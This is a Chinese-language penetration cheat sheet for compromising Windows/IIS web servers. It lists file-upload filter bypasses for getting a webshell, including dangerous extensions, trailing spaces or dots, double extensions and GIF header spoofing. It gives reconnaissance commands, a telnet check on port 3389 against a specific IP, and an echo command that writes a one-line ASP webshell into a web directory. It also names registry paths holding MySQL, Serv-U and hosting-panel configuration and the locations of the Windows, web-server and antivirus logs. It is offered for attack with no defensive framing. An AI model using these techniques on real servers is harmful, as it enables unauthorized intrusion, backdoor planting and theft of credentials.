上传漏洞拿shell:

    1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
    2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
    3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
    4.gif文件头欺骗
    5.同名重复上传也很OK。:

入侵渗透中用到的命令,语法:

    set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
    tasklist /svc   查看 服务对应的pid 
    netstat -ano,netstat -abnv
    fsutil.exe fsinfo drives  列出全部盘符
    dir d:\*conn*.* /s     找数据库连接文件
    telnet 218.25.88.234 3389    对外部是否开放了这个端口
    echo  ^<%execute(request("cmd"))%^> >>e:\k\X.asp   写一句话到e:\k\目录,密码为cmd.
    type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp   传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感信息:

    HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\    mysql 注册表位置
    HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\   华众主机位置
    HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\    serv-u 位置
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters    1433端口
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\  服务器ftp路径

服务器日志文件物理路径:

    安全日志文件:%systemroot%\system32\config \SecEvent.EVT
    系统日志文件:%systemroot%\system32\config \SysEvent.EVT
    应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT
    FTP连接日志和HTTPD事务日志:systemroot% \system32\LogFiles\,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
    诺顿杀毒日志:C:\Documents and Settings\All Users\Application Data\Symantec